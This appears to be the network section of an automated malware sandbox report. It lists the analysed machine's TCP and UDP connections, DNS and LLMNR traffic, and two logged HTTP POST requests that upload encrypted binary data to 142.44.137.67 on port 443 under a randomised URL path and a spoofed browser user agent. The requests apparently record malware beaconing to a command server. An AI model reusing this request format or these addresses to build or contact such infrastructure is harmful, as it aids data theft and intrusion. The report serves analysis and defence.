Hosts
No hosts contacted.
TCP
Source |
Source Port |
Destination |
Destination Port |
192.168.56.101 |
49188 |
142.44.137.67 |
443 |
52.218.29.52 |
80 |
192.168.56.101 |
49190 |
UDP
Source |
Source Port |
Destination |
Destination Port |
192.168.56.101 |
49235 |
114.114.114.114 |
53 |
192.168.56.101 |
51963 |
114.114.114.114 |
53 |
192.168.56.101 |
53210 |
114.114.114.114 |
53 |
192.168.56.101 |
55368 |
114.114.114.114 |
53 |
192.168.56.101 |
58367 |
114.114.114.114 |
53 |
192.168.56.101 |
60215 |
114.114.114.114 |
53 |
192.168.56.101 |
137 |
192.168.56.255 |
137 |
192.168.56.101 |
138 |
192.168.56.255 |
138 |
192.168.56.101 |
123 |
20.189.79.72 time.windows.com |
123 |
192.168.56.101 |
50002 |
224.0.0.252 |
5355 |
192.168.56.101 |
50534 |
224.0.0.252 |
5355 |
192.168.56.101 |
53380 |
224.0.0.252 |
5355 |
192.168.56.101 |
53657 |
224.0.0.252 |
5355 |
192.168.56.101 |
56539 |
224.0.0.252 |
5355 |
192.168.56.101 |
56804 |
224.0.0.252 |
5355 |
192.168.56.101 |
57756 |
224.0.0.252 |
5355 |
192.168.56.101 |
57874 |
224.0.0.252 |
5355 |
192.168.56.101 |
60123 |
224.0.0.252 |
5355 |
192.168.56.101 |
60221 |
224.0.0.252 |
5355 |
192.168.56.101 |
60384 |
224.0.0.252 |
5355 |
HTTP & HTTPS Requests
URI |
Data |
http://142.44.137.67:443/sek1kr38x/kwVMTiN/unnPVk3YMj2BY/zz6Hd/GfXKyvckN/blQa28mGq/ |
POST /sek1kr38x/kwVMTiN/unnPVk3YMj2BY/zz6Hd/GfXKyvckN/blQa28mGq/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------QdvHEfTjLRe3y
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4516
Connection: Keep-Alive
Cache-Control: no-cache
---------------QdvHEfTjLRe3y
Content-Disposition: form-data; name="wrsk"; filename="pnbrdjtuchzqyethpb"
Content-Type: application/octet-stream
@\xacF\xb1\xcd^\xa8\xf7\xfa\xc3\xfe-ey\xca<\UP7\x97\xcdBUm\xce4\xa4\xb7\xdc\xf9\xb0\x84\x810\xf3s\x81*\x91fV\xc6|~\x136t\xe3\xb7\xe3"\xf9\xb1\xc9\xcf+\xfa\x19\x9d\xdfm\x06\x89\xefJa\xc6\xa7\x16\xf6\xdb\x1av\xf8\x8f\xb5\xd9\xebS\xee\xd9)\xf1(q\xff\x7f|D\xbc\xe6I\xf5\xea{\xbc\x02\xb5\xff\xfd=S\xef\x86z$\x940\xbd\x914B#8tb\xea65\xfc+\x1a\xc6\x89\xa6\xd1\xa0t\x02\xd8\xcbD
\xc6$\x7f\xe5\xdd\xcbY\x06R\x8e\xfc\xfc\xfdXx\xab\xb7\xb8\x821q\xf7eP\xc7e\xb9\x8bA#\x01\xe5\xc3\xfe\xb17\xa4\xd1\x90\x88\xa5\xb2\xbd\xf8\xb8\x82\x9cF\x11\x94\xec*\xc8\xec\x9fT\xa7\x9bb\x10\x9d\x93\xfd\xc6\x9ffs`\x9f/\xf4B\xfa\xa7\xbdV\xf8El\xac=\xdft<\x8f2\xbd\x02\x83\xc3o\xf8#\xd5\x81\xc6+:\x13\xeb\x9b\xf2\xe5U!\xb6u\o\xf2\xf1k6\xab\x8d\x8a\x87{\xda\xdd\xd6P\x14\x0e|\xce/\x7f\xf5\xa7\x86]\x01\x99>\x05\xe1\xd4't*\xdc\xb0n
:\xab\x11\x91\x88DW\x1dltJB\x80,\x07P\x8f\xba\xde\xea:\xfd,\x81\xa2\xc8\xd2b\xe6^\x14\xf5b\x07u\xa9\xb1"(\xe0\xee\xea\xe4\xe4\xc5\xab[8&\xd2\xc3\xef\xa0s8pP\x10{7F\xe3 \x10\xa8\x93N\xf7\xa2'\xcf\x1e\x0e\xaf1\xbfk\x9b\xb5\xd2\xee\xfexP\x04\xc7#\xfa\xd7\x86\x1c\xaf
\xd7c\x88\xf6\xaf\x8d\xb0\xb6\xdaZ\x94Mr\xb7\xb9T.a\xb3;e\x9c\xb9\x05@@%\xa1\xb09aDG\xf8\xe6\xf1\xba&\x7fq\x94i\xfd{\xacn\xd9\xb1
---------------QdvHEfTjLRe3y--\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
http://142.44.137.67:443/sek1kr38x/kwVMTiN/unnPVk3YMj2BY/zz6Hd/GfXKyvckN/blQa28mGq/ |
POST /sek1kr38x/kwVMTiN/unnPVk3YMj2BY/zz6Hd/GfXKyvckN/blQa28mGq/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------QdvHEfTjLRe3y
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4516
Connection: Keep-Alive
Cache-Control: no-cache
|
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts